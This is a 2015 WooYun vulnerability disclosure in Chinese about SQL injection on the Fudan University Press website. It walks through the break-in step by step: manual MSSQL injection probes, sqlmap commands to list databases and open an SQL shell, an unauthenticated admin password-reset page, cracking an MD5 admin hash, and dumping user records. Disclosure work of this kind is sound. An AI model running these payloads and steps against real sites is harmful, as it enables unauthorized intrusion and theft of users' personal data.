当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116184

漏洞标题:复旦大学出版社低调注入

相关厂商:cncert国家互联网应急中心

漏洞作者: Virink

提交时间:2015-06-03 10:28

修复时间:2015-07-23 08:14

公开时间:2015-07-23 08:14

漏洞类型:用户资料大量泄漏

危害等级:低

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-03: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开

简要描述:

因为一个意外,造就了这一次的检测。。。什么意外就不说了。。
虽然只是public权限,数据库还是随便看的

详细说明:

浏览页面的时候,发现了新闻showinfo.asp?id=255,随时加个'就爆出了错误
字符型注入,还是mssql,不能太过依赖工具,首先就是手工检测。
存在xp_cmdshell :and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')
但是权限只是public:and (select IS_MEMBER('public'))=1-- //public
不能提权,另外也爆不出什么表来
我们再看看有什么其他的发现,扫一下目录,发现了manage后台目录
手工渣渣,所以,注入点直接丢进sqlmap
暴库:sqlmap -u ****showinfo.asp?id=262 –dbs
datebase:
ApaDLibrary_1
Commonservice_1
edu_en
fudanbook
Group_1
master
model
msdb
MyLibrary_1
Northwind
pubs
tempdb
Usp_1
爆表:sqlmap -u ***showinfo.asp?id=262 -v 1 --tables -D "fudanbook"
出现了意外,死活爆不出来
然后试了试:sqlmap.py -u ***showinfo.asp?id=262 --sql-shell
成功进入sql shell,但是我还不知道什么表,什么咧
换个方向
看看网站还有什么信息,然后找到:http://edu.fudanpress.com/
扫目录,结构差不多,也有manage
随手点开,我艹,遍历,,能看到所有文件
一个一个打开,找出设计漏洞,某个页面没有验证权限,可以直接设定用户密码
输入了一个test,12346,居然没有成功,然后重输admin,*****
成功了,登陆后台,杯具的后台,到处找没发现什么上传点
到www.****后台,无法登陆
再次用那个页面,果然存在,可惜改不了密码,没有写库的权限。
回到edu后台目录,再次一个个打开页面,到处都是错误,有一个页面爆出表名fdpress_***
有聊,回到sqlshell:select * from fdpress_admin
出来了,密码出来了,16位md5的值
解密成功,登陆后台,功能比edu的更多,翻找下,找到了一个修改封面的、、结果郁闷了,上传的文件是写到数据库,结果还是没有权限写入
无奈了
不死心,再次回到sqlshell:select * from fdpress_user
大量用户信息、、、泄漏了~~
本次检测到此为止了,没能getshell有点遗憾。

漏洞证明:

1.png


2.png

修复方案:

XX

版权声明:转载请注明来源 Virink@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-08 08:13

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向教育网应急组织通报,由其后续协调网站管理单位处置.

最新状态:

暂无